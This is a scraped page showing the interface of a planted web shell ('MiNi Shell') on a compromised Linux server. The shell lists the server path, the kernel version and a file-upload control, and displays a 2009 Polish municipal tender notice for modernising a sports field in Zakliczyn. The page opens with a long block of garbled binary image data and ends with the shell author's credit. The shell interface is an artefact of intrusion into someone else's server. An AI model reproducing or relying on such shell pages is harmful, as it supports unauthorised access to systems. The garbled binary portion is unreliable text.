JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20090706/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20090706/105391-N-2009.html

<p class="kh_header"><b>Siepraw: Modernizacja boiska sportowego w Zakliczynie</b><br>
<b>Numer ogłoszenia: 105391 - 2009; data zamieszczenia: 06.07.2009</b><br>
OGŁOSZENIE O ZAMÓWIENIU - roboty budowlane<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Urząd Gminy , Siepraw 1, 32-447 Siepraw, woj. małopolskie, tel. 012 2746299, faks 012 3721806.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.siepraw.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Modernizacja boiska sportowego w Zakliczynie.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> roboty budowlane.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Przedmiotem zamówienia jest modernizacja boiska sportowego położonego na dz. 809/2 w Zakliczynie objęta prawomocnym pozwoleniem na budowę Starosty Myślenickiego Zn.ABVIII.7351/1332/2008 Nr decyzji 76/2009 z dnia 4 luty 2009r., obejmująca wykonanie trybun, oświetlenia boiska sportowego, parkingu, chodników oraz wykonanie robót budowlanych (etap II) z instalacjami wod-kan-elektr wraz z wyposażeniem budynku sanitarno-szatniowego.  

ZESTAWIENIE ELEMENTÓW CHARAKTERYSTYCZNYCH:

TRYBUNY: Projektowane trybuny zewnętrzne zlokalizowane są przy istniejącym boisku sportowym w odległości 5,5m od krawędzi boiska sportowego i dodatkowo wydzielone istniejącym ogrodzeniem. Przewiduje się trybuny trzyrzędowe dla 144 osób. Konstrukcję nośną stanowią ściany żelbetowe w rozstawie co 288cm na których wsparte są płyty żelbetowe do których przy pomocy kołków rozporowych montowane są siedziska sportowe. 
Długość płyty trybun - 29,80m, Szerokość płyty trybun - 3,60m.  

OŚWIETLENIE BOISKA SPORTOWEGO: wykonanie linii kablowej niskiego napięcia zasilającej słupy oświetleniowe, montaż słupów oświetleniowych oraz montaż naświetlaczy dla oświetlenia istniejącego boiska sportowego. Sterowanie oświetleniem odbywać się będzie  z projektowanej szafki sterującej. Zasilanie projektowanego oświetlenia odbywać się będzie z istniejącego złącza kablowego ZK.  Istniejące słupy oraz kabel zasilający należy zdemontować. Istniejący przydział mocy jest wystarczający do wykonania oświetlenia boiska.
Linia kablowa niskiego napięcia typu YAKXs 4x35 mm2 - 117m,
Linia kablowa oświetlenia typu YKY 5x4 mm2 - 291m,
Słupy oświetleniowe typu CS-76/120/4p - 6szt,
Naświetlacze SONPAK 25/40 HSI-T 400 W Thorn - 24 szt,
Szafka sterowania oświetleniem SSO - 1 szt.

PARKING: Budowa parkingu z dziesięcioma stanowiskami postojowymi dla samochodów osobowych. Stanowiska postojowe szer. 3,0m i dł. 5m, w tym jedno dla niepełnosprawnych o wym. 3,5mx5m. Parking będzie usytuowany pod kontem 90° do drogi gminnej o kształcie prostokąta o wym. 35,5mx5m. Nawierzchnia parkingu:
- warstwa dolna podbudowy z kruszywa naturalnego o grubości po zagęszczeniu 20cm - 168,m2, 
- warstwa górna podbudowy z kruszywa naturalnego o grubości po zagęszczeniu 8cm - 168,m2,
- nawierzchnie z kostki brukowej betonowej grubość 8cm, układane na podsypce piaskowej - 168,m2,
- krawężniki betonowe o wymiarach 15x30cm wystające na podsypce cementowo-piaskowej 40,00m,
- krawężniki betonowe o wymiarach 12x25cm wtopione na podsypce cementowo-piaskowej 28,00m.

ROBOTY WYKOŃCZENIOWE I PIĘTRA BUDYNKU SANITARNO-SZATNIOWEGO: Wykonanie robót budowlano wykończeniowych w tym; ułożenie suchych tynków, tynków wewnętrznych, wykonanie ścianek działowych z cegły, podłoża i posadzki, wykonanie schodów zewnętrznych, wykonanie instalacji kanalizacyjnej, elektrycznej i wodociągowej na I piętrze, wyposażenie budynku. 
  
CHODNIKI: Projektuje się komunikację pieszą z kostki brukowej betonowej na podsypce piaskowej stabilizowanej cementem, obejmującą wykonanie następujących robót:
- warstwa dolna podbudowy z kruszywa naturalnego o grubości po zagęszczeniu 20cm - 298,73m2, 
- warstwa górna podbudowy z kruszywa naturalnego o grubości po zagęszczeniu 8cm - 298,73m2,
- nawierzchnie z kostki brukowej betonowej grubość 6cm, układane na podsypce piaskowej 298,73m2,
- obrzeża betonowe o wymiarach 30x8 cm na podsypce piaskowej z wypełnieniem spoin zaprawą cementową - 361,00m.

PIŁKOCHWYTY, BOKSY DLA REZERWY, BRAMKI TRENINGOWE:
Dostawa i montaż piłkochwytów 48mx6m w ilość 2,0 kpl.
Dostawa i montaż typowych zadaszeń (boksów) dla zawodników rezerwy (6-7 miejsc) w ilości 2szt.  
Dostawa bramek treningowych z siatkami - 1 para..</p>
<p><b>II.1.4) Wspólny Słownik Zamówień (CPV):</b> 45.21.22.21-1.</p>
<p><b>II.1.5) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.1.7) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p><p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 16.11.2009.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WARUNKI DOTYCZĄCE ZAMÓWIENIA</b>
</p><b>Informacja na temat wadium:</b> Zamawiający wymaga wniesienia wadium w wysokości: 10000 zł (słownie; dziesięć tysięcy złotych), do dnia 28.07.2009r., do godz. 10.00.
11.2. W zależności od woli Wykonawcy wadium może być wnoszone w jednej lub kilku z następujących form:
a.	pieniądzu,
b.	poręczeniach bankowych lub poręczeniach spółdzielczej kasy oszczędnościowo-  kredytowej, z tym że poręczenie kasy jest zawsze poręczeniem pieniężnym,
c.	gwarancjach bankowych,
d.	gwarancjach ubezpieczeniowych,
e.	poręczeniach udzielonych przez podmioty, o których mowa w art. 6b ust. 5 pkt. 2 ustawy z dnia 9.11.2000r., o utworzeniu PARP (Dz. U. Nr 109 poz. 1158 z późn. zm.).
11.3	Za termin wniesienia wadium przelewem w formie pieniężnej zostanie przyjęty termin uznania rachunku Zamawiającego. Wadium wnoszone w pieniądzu należy wpłacić przelewem na rachunek bankowy Zamawiającego Nr KBS o-SIEPRAW nr 59 85910007 0240 0000 0228 0006 z dopiskiem: Przetarg nieograniczony Nr GII.341-6/2009 Modernizacja boiska sportowego w Zakliczynie
11.4	Potwierdzeniem  wniesienia wadium w pieniądzu będzie kopia przelewu (wpłaty) załączona do oferty. 
11.5	Potwierdzenie wniesienia wadium w pozostałych formach załączyć należy do oferty oryginał, załączony w sposób luźny, tzn. nie trwale związany z ofertą. Równocześnie do oferty należy załączyć kserokopię potwierdzoną za zgodność z oryginałem potwierdzenie wniesienia wadium, wpięte do oferty. 
11.6	Wadium zostanie zwrócone, jeżeli;
a) upłynął termin związania z ofertą, 
b) zawarto umowę w sprawie zamówienia publicznego i wniesiono zabezpieczanie należytego wykonania tej umowy,
c) zamawiający unieważnił postępowanie o udzielnie zamówienia, a protesty zostały ostatecznie rozstrzygnięte lub upłynął termin do ich wnoszenia.
Ponadto;
  Zamawiający zwróci niezwłocznie wadium na wniosek Wykonawcy;
- który wycofał ofertę przed upływem terminu składania ofert, 
- który został wykluczony z postępowania,
- którego oferta została odrzucona.
11.7	Jeżeli wadium wniesiono w pieniądzu, Zamawiający zwróci je wraz z odsetkami wynikającymi z umowy rachunku bankowego, na którym było ono przechowywane, pomniejszone o koszty prowadzenia rachunku bankowego oraz prowizji bankowej za przelew pieniędzy na rachunek bankowy wskazany przez Wykonawcę.
11.8	Zamawiający zatrzymuje wadium wraz z odsetkami, jeżeli Wykonawca w odpowiedzi na wezwanie o którym mowa w art. 26 ust.3 ustawy Prawo Zamówień Publicznych  nie złożył dokumentów lub oświadczeń potwierdzających spełnienie warunków udziału w postępowaniu, lub pełnomocnictw chyba, że udowodni, że wynika to z przyczyn nie leżących po jego stronie (art.46 ust.4a ustawy Prawo Zamówień Publicznych).
11.9	Zamawiający zatrzymuje wadium jeżeli Wykonawca, którego oferta została wybrana;
1)	odmówił podpisania umowy w sprawie zamówienia publicznego na warunkach określonych w ofercie;
2)	nie wniósł wymaganego zabezpieczenia należytego wykonania umowy;
3)	zawarcie umowy w sprawie zamówienia publicznego stało się niemożliwe z przyczyn leżących po stronie wykonawcy.
11.11. Oferta niezabezpieczona wadium w wymaganym terminie, spowoduje wykluczenie Wykonawcy przez Zamawiającego.
11.12. Wadium dla konsorcjum może być wniesione przez jednego z uczestników konsorcjum<br><p><b>III.2) WARUNKI UDZIAŁU</b></p>
<ul class="kh_indent_1"><li><b>Opis warunków udziału w postępowaniu oraz opis sposobu dokonywania oceny spełniania tych warunków:</b> O udzielenie zamówienia mogą ubiegać się Wykonawcy, którzy:
1)	Posiadają uprawnienia do wykonywania określonej działalności lub czynności, jeżeli ustawy nakładają obowiązek posiadania takich uprawnień.
2)	Posiadają niezbędną wiedzę i doświadczenie oraz dysponują potencjałem technicznym i osobami zdolnymi do wykonania zamówienia lub przedstawią pisemne zobowiązanie innych podmiotów do udostępnienia potencjału technicznego i osób zdolnych do wykonania zamówienia
3)	Znajdują się w sytuacji ekonomicznej i finansowej zapewniającej wykonanie zamówienia.
4)	Nie podlegają wykluczeniu z postępowania o udzielenie zamówienia na skutek okoliczności określonych w art. 24 ustawy Prawo Zamówień Publicznych. 

8.1.2	Warunki szczegółowe wymagane od wykonawców :
1)	Wykonawca dysponuje lub będzie dysponował pracownikami posiadającymi odpowiednie kwalifikacje zawodowe wymagane przepisami ustawy z dnia 7 lipca 1994r. Prawo budowlane (Dz. U. z 2003r., nr 207, poz. 2016 z późn. zm.), oraz należącymi do właściwej Okręgowej Izby Inżynierów Budownictwa. Wykonawca wykaże, że dysponuje pracownikami, którzy posiadają uprawnienia budowlane do:
-   kierowania robotami budowlanymi bez ograniczeń w specjalności
    Konstrukcyjnobudowlanej,
-   instalacji elektrycznych.
2)	Wykonawca udokumentuje, że w okresie ostatnich 5 lat wykonał co najmniej 2 roboty budowlane, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, roboty ogólnobudowlane odpowiadające swą wartością przedmiotowi zamówienia - (o wartości pojedynczego zamówienia nie mniej niż 300 000,00 zł brutto), z podaniem ich wartości oraz daty i miejsca wykonania wraz z udokumentowaniem, iż roboty te zostały wykonane należycie. Do oceny Zamawiający weźmie pod uwagę oferty Wykonawców, którzy udokumentują realizację projektów których rozpoczęcie i zakończenie mieści się w okresie ostatnich 5 lat, a jeżeli okres prowadzenia jest krótszy w tym okresie, licząc od dnia składania ofert.
8.1.3  Wykonawcy mogą wspólnie ubiegać się o udzielenie zamówienia, ustanawiając pełnomocnika do reprezentowania ich w postępowaniu o udzielnie zamówienia albo reprezentowania w postępowaniu i zawarcia umowy w sprawie zamówienia publicznego. W takim przypadku warunki udziału w postępowaniu, dotyczące Wykonawcy odnoszą się odpowiednio do Wykonawców, którzy ubiegają się wspólnie o zamówienie publiczne. Wszelka korespondencja oraz rozliczenia dokonywane będą wyłącznie z podmiotem występującym jako pełnomocnik pozostałych. Jeżeli oferta Wykonawców wspólnie ubiegających się o udzielnie zamówienia zostanie wybrana Zamawiający zażąda przed zawarciem w sprawie zamówienia publicznego umowy regulującej współpracę tych Wykonawców. 
8.2	Opis sposobu dokonywania oceny spełniania warunków udziału w postępowaniu:
8.2.1.	Ocena spełniania warunków udziału w postępowaniu dokonywana będzie w formule spełnia - nie spełnia w oparciu o dokumenty załączone do oferty, a których wykaz zawiera punkt 9 niniejszej specyfikacji. 
8.2.2.	Dokumenty dołączone do oferty winny być podpisane przez osobę (osoby)
upoważnioną (upoważnione) do reprezentowania Wykonawcy na zewnątrz. Upoważnienie do podpisania oferty powinno być dołączone do oferty o ile nie wynika bezpośrednio z innych dokumentów załączonych do oferty.
8.2.3 Przy ocenie spełnienia warunków udziału, o których mowa w pkt 9.1 ppkt. 5 i 6  SIWZ przez Wykonawców wspólnie ubiegających się o udzielenie zamówienia wielkości stanowiące o spełnieniu określone będą zsumowane..</li>
<li><b>Informacja o oświadczeniach i dokumentach, jakie mają dostarczyć wykonawcy w celu potwierdzenia spełniania warunków udziału w postępowaniu:</b> 9.1	W celu potwierdzenia spełnienia warunków udziału w postępowaniu Wykonawcy mają dostarczyć:
1.	Oświadczenie o spełnieniu warunków udziału w postępowaniu zgodnie ze wzorem stanowiącym załącznik nr 2 do niniejszej specyfikacji istotnych warunków zamówienia.
2.	Aktualny odpis z właściwego rejestru albo aktualne zaświadczenia o wpisie do ewidencji działalności gospodarczej, wystawione nie wcześniej niż 6 miesięcy przed upływem terminu składania ofert.
3.	Aktualne zaświadczenie właściwego naczelnika Urzędu Skarbowego, potwierdzające, że Wykonawca nie zalega z opłacaniem podatków, lub zaświadczenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu wystawione nie wcześniej niż 3 miesięcy przed upływem terminu składania ofert.
4.	Aktualne zaświadczanie oddziału Zakładu Ubezpieczeń Społecznych lub Kasy Rolniczego Ubezpieczenia Społecznego potwierdzające, że Wykonawca nie zalega z opłacaniem opłat oraz składek na ubezpieczenie zdrowotne i społeczne. Lub zaświadczenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu wystawione nie wcześniej niż 3 miesięcy przed upływem terminu składania ofert.      
5.	Wykaz co najmniej 2 inwestycji wykonywanych w ciągu ostatnich 5 lat, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, z podaniem ich wartości, przedmiotu, daty wykonania i odbiorców (zgodnie ze wzorem stanowiącym załącznik nr 3 do niniejszej specyfikacji istotnych warunków zamówienia) oraz załączenia dokumentów potwierdzających, że prace te zostały wykonane należycie (referencje, protokoły odbioru).
6.	Wykaz kierowników sporządzony według załączonego wzoru stanowiącego załącznik nr 4 do niniejszej specyfikacji i załączyć kwalifikacje i przynależność do Okręgowej Izby Inżynierów Budownictwa.
9.2	Dokumenty wymienione w punkcie 9.1. mogą być przedstawione w formie oryginału lub kserokopii poświadczonej za zgodność z oryginałem przez osoby uprawnione, upoważnione do reprezentowania Wykonawcy.
9.3	W przypadku składania oferty przez Wykonawców wspólnie ubiegających się o zamówienie; 
a)	do oferty należy dołączyć pełnomocnictwo sporządzone w formie pisemnej, określające osobę pełnomocnika, zakres reprezentacji, wskazanie postępowania o udzielnie niniejszego zamówienia. Pełnomocnictwo powinni podpisać wszyscy Wykonawcy wspólnie ubiegający się o udzielnie zamówienia,
b)	oświadczenia dotyczące warunków udziału w postępowaniu składa każdy Wykonawca ubiegający się wspólnie o zamówienie - tj. dokumenty wymieniane w pkt 9.1 SIWZ.
c)	Ofertę składa pełnomocnik w imieniu wszystkich Wykonawców ubiegających się wspólnie o zamówienie.
9.4	W przypadku realizacji zamówienia przy współudziale podwykonawców Wykonawca musi   załączyć do oferty szczegółowy   wykaz   zakresu   robót,   których   wykonanie Wykonawca   zamierza   powierzyć podwykonawcom.
9.5  Wykonawcy wspólnie ubiegający się o zamówienie:
1) ponoszą solidarną odpowiedzialność za niewykonanie lub nienależyte wykonanie zamówienia,
2)  zamawiający może w ramach odpowiedzialności solidarnej żądać wykonania umowy w całości przez partnera kierującego lub od wszystkich partnerów łącznie lub od każdego z osobna, albo też w inny sposób ustalony w umowie konsorcjum,
3)  zobowiązani są ustanowić Pełnomocnika do reprezentowania ich w postępowaniu o udzielenie zamówienia publicznego albo reprezentowania w postępowaniu i zawarcia umowy w sprawie zamówienia publicznego. Przyjmuje się że pełnomocnictwo do podpisania oferty obejmuje pełnomocnictwo do poświadczenia za zgodność z oryginałem wszystkich dokumentów,
4)   jeżeli oferta konsorcjum zostanie wybrana jako najkorzystniejsza, Zamawiający zażąda przed zawarciem umowy w sprawie zamówienia publicznego pełnomocnika do przedstawienia umowy regulującej współpracę tych Wykonawców..</li></ul>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>

<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>
<br><p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p><p><b>IV.2.2) Wykorzystana będzie aukcja elektroniczna:</b> nie.</p><br><p><b>IV.3) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.3.1)</b>&nbsp;<b>Adres strony internetowej, na której dostępna jest specyfikacja istotnych warunków zamówienia:</b> www.siepraw.pl.<br><b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Urząd Gminy Siepraw 32-447 Siepraw 1 pok. 28.</p>
<p><b>IV.3.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 28.07.2009 godzina 10:00, miejsce: Urząd Gminy Siepraw 32-447 Siepraw 1 pok. 28.</p><p><b>IV.3.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com